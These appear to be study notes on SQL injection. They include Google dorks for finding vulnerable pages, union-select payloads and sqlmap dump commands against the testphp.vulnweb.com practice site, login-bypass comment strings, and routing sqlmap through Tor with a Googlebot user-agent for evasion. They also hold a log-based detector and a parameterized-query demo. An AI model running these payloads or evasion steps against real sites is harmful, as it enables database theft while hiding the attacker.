Simple notes from learning SQL injection

Reference articles

Reference for study: http://bbs.pediy.com/thread-218235.htm

Google search:
inurl:"products.php?prodID="

inurl:buy.php?category=

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat='

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Sometimes the server cannot interpret @@version directly and it has to be converted: replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
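The request sequence above (order by probing, then union select with @@version and information_schema, then sqlmap) leaves a recognisable trail in a web server's access log. The following is an added detection example written for this page; it is not code from the original post or from sqlmap. The log lines, the addresses and the sqlmap user-agent string are constructed for the example, and the pattern names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log lines in Common Log Format plus referer and
# user-agent fields (made up for this example, not captured traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /listproducts.php?cat=1+order+by+6 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version HTTP/1.1" 200 4090 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 5010 "-" "sqlmap/1.0 (constructed user-agent string)"
192.0.2.9 - - [10/Oct/2023:13:56:10 +0000] "GET /listproducts.php?cat=3 HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns are applied to the *decoded* parameter value, so the "+" and %xx
# encodings seen in the URLs above cannot hide the keywords.
SQLI_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "server_variable": re.compile(r"@@\w+"),
    "comment_terminator": re.compile(r"(?:--|#|/\*)\s*$"),
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
    "lone_quote": re.compile(r"^'$"),
}
SCANNER_UA = re.compile(r"\bsqlmap\b", re.I)


def classify_value(value: str) -> list[str]:
    """Return the names of every pattern that matches one decoded parameter value."""
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(value)]


def analyze_log(text: str) -> list[dict]:
    """Scan access-log text; one alert per suspicious parameter value or user-agent."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than abort the whole scan
        query = urlsplit(m["target"]).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                alerts.append({"ip": m["ip"], "time": m["time"], "param": param,
                               "value": value, "reasons": reasons})
        if SCANNER_UA.search(m["ua"]):
            alerts.append({"ip": m["ip"], "time": m["time"], "param": "User-Agent",
                           "value": m["ua"], "reasons": ["scanner_user_agent"]})
    return alerts


def summarize_by_ip(alerts: list[dict]) -> dict[str, int]:
    """Count alerts per source address; a burst from one client is the usual trigger."""
    counts: dict[str, int] = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["ip"], a["param"], a["reasons"])
    print(summarize_by_ip(found))
```

The user-agent check is the weakest signal here: as the later note on disguising sqlmap as Googlebot shows, the agent string is fully under the client's control, so the parameter-value patterns and the per-address burst count are what a detection rule should lean on.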

Types of SQL injection attacks
Classic SQLi
Blind or inferential SQL injection
DBMS-specific SQLi
Compound SQLi
SQL injection + insufficient authentication
SQL injection + DDoS attack
SQL injection + DNS hijacking
SQL injection + XSS

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed straight into an SQL statement:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

Comments can even be used to cut off the rest of the query (there are three types of SQL comment). All three lines end with a trailing space:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
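The concatenated statement above, run against an in-memory SQLite database both as written and with a bound parameter, so the effect of the comment payloads can be seen side by side. This is an added example, not code from the original post; the users table and its three rows are constructed. Of the three comment forms listed, SQLite accepts `--` and `/*`, which is enough to show the difference.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed in-memory table standing in for the page's "users" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_name: str) -> list:
    # The page's build: the input becomes part of the SQL text, so a quote
    # ends the literal and a comment discards the closing quote and semicolon.
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_name: str) -> list:
    # Hardened form: the value is bound separately and is never parsed as SQL,
    # so quotes and comment markers inside it are just characters of a name.
    return conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


def compare(user_name: str):
    """Return (rows from the concatenated query, rows from the bound query)."""
    conn = make_db()
    try:
        vulnerable = len(lookup_vulnerable(conn, user_name))
    except sqlite3.Error as exc:
        vulnerable = f"error: {exc}"  # input that breaks the syntax instead
    return vulnerable, len(lookup_parameterized(conn, user_name))


if __name__ == "__main__":
    for name in ("alice", "' or '1'='1' --", "' or '1'='1' /*"):
        print(repr(name), "->", compare(name))
```

For the benign name both queries return one row; for the two comment payloads only the concatenated build returns every row in the table, while the bound query returns nothing because no user has that literal name.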

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

apt-get install tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

Disguised as Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
